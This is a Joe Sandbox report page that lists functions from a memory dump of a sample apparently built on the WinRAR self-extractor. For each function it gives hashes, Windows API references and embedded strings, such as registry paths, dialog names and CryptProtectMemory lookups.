Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
Instruction ID: e70644adc0295f1f2906be6e495cc143712544482b196dd2f7ca05a9627a580f
Opcode Fuzzy Hash: 9d335eb4e928305fcc536e7a574871e99efd96511b41f203bfcc60166aca6fdf
Instruction Fuzzy Hash: D081D622B1824287EAA8BE25704067EE391EF41F64FD41531DD09D7796CF2DF86687E0

Function 00007FF7C01ABDF8 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00007FF7C01ABF92

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
Instruction ID: fcc38b3ae2788a904c8522abeba2592006215f486b20021b75dafd50ef6e704b
Opcode Fuzzy Hash: db1fee231e5625b661d99c0bb1e1601d32928d345e8b8bd10099f265d6b394a5
Instruction Fuzzy Hash: 1471C621A082C24BEB64AE2574802BDD790AB41F64F980535DE09C77D7CF2DFA658FE1

Function 00007FF7C01AFD18 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

@, xrefs: 00007FF7C01AFD54

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
Instruction ID: c45ef560e090a5c9c55f7b093e1b74bc13fab942a8046819351bbbdf98075bad
Opcode Fuzzy Hash: 75bc8b6b70552213c492e2b4d537d895552732abb840669c88296365ff73b3bd
Instruction Fuzzy Hash: CE41DF72714A548AEE04EF6AE4542ADF3A1A758FE0B899036DE0DCB755EF3CE042C340

Function 00007FF7C01B41B0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7C01B41B4

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
Instruction ID: 693f46eb205c6421564c3e81c1a07ea2560b3ceca33ff3306e68fe6066ac5b72
Opcode Fuzzy Hash: be7ed4402fc1a38c1953c688923f2ad906cda00ccdf3b5d5fa14c8939cdf2fd3
Instruction Fuzzy Hash: 34B09220E07A06CBEA093F117CC621DA2A87F48B20FD48078C40C81360DF6C32A58F60

Function 00007FF7C018BF0C Relevance: .6, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
Instruction ID: a413eb423f97b2570f9bc86399415dedb256be0e1900c641679921a6e167c6d6
Opcode Fuzzy Hash: cd28e31d7d5d8dacbc8c1e36a10d9298773be20ef7319678f464fee92af96a22
Instruction Fuzzy Hash: 7F220673B206508BD728CF25D89AE5E7766F798744B4B8228DF0ACB785DB38D605CB40

Function 00007FF7C018B318 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
Instruction ID: 99414c8697c674a02edb6e476fce049996fef9c0a37a05ccea2427e31c0f630a
Opcode Fuzzy Hash: c6c4f15c2075db455a8805df7f1b959bd99bc7369c78054583d6a965d91bd105
Instruction Fuzzy Hash: BFD18C72A181D14EE312CB79A0544BEBFB5E31D34DB8A8251DFD59374AC62EE202DB60

Function 00007FF7C018B948 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
Instruction ID: c3ccb1c0176495a496265a1e9ef1484e3c35a1b31a4b0c4d26e09614fae590f6
Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
Instruction Fuzzy Hash: 40612722B181D14AEB11DF7595804FDFFA1A709B947864132CE9A9374ADB3CF305CBA1

Function 00007FF7C018DBDC Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction ID: 8004bc7538211a4a0eb84e9669d5e1a76f1e28c98ddffac22244f40feecc4a2f
Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
Instruction Fuzzy Hash: 30F06D61A6C60243FE1C2828644973DD2429B90B24F92863DD00AC63C1DB9CBB81A3E6

Function 00007FF7C01A6B24 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
Instruction ID: 60f44e668c0d1d5ca8870f4973b1a882d546be7bbbe892041200d07ba6a2bbb1
Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
Instruction Fuzzy Hash: 4AA00165A08912D2E648AF00B8A4528E264BB54B20BC00031D81DC16A29F6CB55086A0

Function 00007FF7C01A61E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF7C01A61F6
GetModuleHandleW.KERNEL32 ref: 00007FF7C01A6203
GetModuleHandleW.KERNEL32 ref: 00007FF7C01A6218
GetProcAddress.KERNEL32 ref: 00007FF7C01A6230
GetProcAddress.KERNEL32 ref: 00007FF7C01A6243
CreateEventW.KERNEL32 ref: 00007FF7C01A626F
DeleteCriticalSection.KERNEL32 ref: 00007FF7C01A62BB
CloseHandle.KERNEL32 ref: 00007FF7C01A62CD

Strings

kernel32.dll, xrefs: 00007FF7C01A6211
WakeAllConditionVariable, xrefs: 00007FF7C01A6236
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00007FF7C01A61FC
SleepConditionVariableCS, xrefs: 00007FF7C01A6226

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
Instruction ID: 4fda4cc8589a15696706c3df19d407fe85d93a83a62e0f0ce394984905d16408
Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
Instruction Fuzzy Hash: A7212E60E1A60783FE15BF10F89567EE2A4BF54F60FC40035D91E82BA0EF6CB55587A0

Function 00007FF7C019DF84 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C01812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01813B6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019E273
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019E279
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019E27F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019E285
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019E28B
EndDialog.USER32 ref: 00007FF7C019E30A

Strings

Software\WinRAR SFX, xrefs: 00007FF7C019E06F, 00007FF7C019E07E
GETPASSWORD1, xrefs: 00007FF7C019E2C3

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 431506467-1315819833
Opcode ID: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
Instruction ID: 8c44bd18a2eccf90f54132f04968c92978696e030d8a176ae3ff9220594d1870
Opcode Fuzzy Hash: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
Instruction Fuzzy Hash: E8B19362F1974286FB00AF64E4442ACE3A2AB45BB4F804235DE5CA7B99DF3CF555C390

Function 00007FF7C01B1B60 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B1CDD

Strings

INF, xrefs: 00007FF7C01B1BD3
nan, xrefs: 00007FF7C01B1BC8
nan(snan), xrefs: 00007FF7C01B1C00
NAN(IND), xrefs: 00007FF7C01B1C0B
NAN, xrefs: 00007FF7C01B1BC1
nan(ind), xrefs: 00007FF7C01B1C16
inf, xrefs: 00007FF7C01B1BE6
NAN(SNAN), xrefs: 00007FF7C01B1BF5

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
Instruction ID: bf37becce00d0f215e83d6a08679a6ecc71a317d8e244c1c68e313344a9627e7
Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
Instruction Fuzzy Hash: D8416976A09B558AE704DF25E8417ADB7E4EB04BA8F81413AEE5C87B54DF38E025C390

Function 00007FF7C01A2EE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindow.USER32 ref: 00007FF7C01A2F1F
GetClassNameW.USER32 ref: 00007FF7C01A2F4C
GetWindowLongPtrW.USER32 ref: 00007FF7C01A2F6D
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2F87
GetObjectW.GDI32 ref: 00007FF7C01A2FA2
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2FD7
DeleteObject.GDI32 ref: 00007FF7C01A2FE0
GetWindow.USER32 ref: 00007FF7C01A2FEE

Strings

STATIC, xrefs: 00007FF7C01A2F52

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Window$ButtonCheckedObject$ClassDeleteLongName
String ID: STATIC
API String ID: 781704138-1882779555
Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
Instruction ID: 5c5d781a899bb6323bcccf3830619602f435945b6fb3b11ebb57797d309f1126
Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
Instruction Fuzzy Hash: A1318F25A1965287EA20AF11B9147BDE3A2AB89FA0F840030DE4D87B55DF3CF50686A0

Function 00007FF7C01880B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 444COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018874A

Part of subcall function 00007FF7C0181BD4: std::_Xinvalid_argument.LIBCPMT ref: 00007FF7C0181BDF

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0188756
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018875C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0188768
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018877A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0188780

Strings

\\?\, xrefs: 00007FF7C01880FB, 00007FF7C018810A
UNC, xrefs: 00007FF7C0188263

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: UNC$\\?\
API String ID: 4097890229-253988292
Opcode ID: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
Instruction ID: 36535165ff2c8bd19ff937205e1f05b5f20320a3e1a6c015a8ba9e24c43c2c35
Opcode Fuzzy Hash: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
Instruction Fuzzy Hash: 8412C122B18B4286EB10EF64E0441ADE371EB41FA8F914231DA5D97BD9DF3CE645C3A1

Function 00007FF7C019AB10 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C019BB2B), ref: 00007FF7C019AD10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019AE0B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019AE11
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019AE17

Strings

</html>, xrefs: 00007FF7C019AC02, 00007FF7C019AC11
<html>, xrefs: 00007FF7C019ABA3
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00007FF7C019ABBC, 00007FF7C019ABCB
<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>, xrefs: 00007FF7C019AB65, 00007FF7C019AB74

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 2721297748-1533471033
Opcode ID: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
Instruction ID: 09b72424fdd7b1626978742b06a4934862e3b3d26a5a1ac195f44bcba60f2906
Opcode Fuzzy Hash: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
Instruction Fuzzy Hash: FB815F62B1864186FB00FFA5E4401EDE3B2AB44BA8FC04135DE1D96795EF38E51AC3E4

Function 00007FF7C019E9E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

LICENSEDLG, xrefs: 00007FF7C019E9FE

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Item$Text
String ID: LICENSEDLG
API String ID: 1601838975-2177901306
Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
Instruction ID: 53001120321061ac8093e0eb73685527aa498cc6d08acbaad7e5ce4eac2b42a4
Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
Instruction Fuzzy Hash: 22415E25A1865283FB14AF51F84877CE2A1AF85FA0F844135DE0E87BA5CF7CF64583A0

Function 00007FF7C018BD30 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7C018BE46

Part of subcall function 00007FF7C018DC4C: GetSystemDirectoryW.KERNEL32 ref: 00007FF7C018DCA3

GetProcAddress.KERNEL32 ref: 00007FF7C018BD8E
GetProcAddress.KERNEL32 ref: 00007FF7C018BDA9

Strings

CryptProtectMemory failed, xrefs: 00007FF7C018BDFC
CryptUnprotectMemory, xrefs: 00007FF7C018BD9B
CryptUnprotectMemory failed, xrefs: 00007FF7C018BE3D
CryptProtectMemory, xrefs: 00007FF7C018BD84
Crypt32.dll, xrefs: 00007FF7C018BD6C

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AddressProc$CurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 2915667086-2207617598
Opcode ID: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
Instruction ID: 608da29695ae899fa60fd030e232642212af4d76cd26aec5123c923d5d0db597
Opcode Fuzzy Hash: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
Instruction Fuzzy Hash: 5E316D60A09B5287EA05AF11B9900BDE3A0AF44FB4BC50235DD5E83BA4DF7CF241C7A1

Function 00007FF7C019C414 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019C9F2
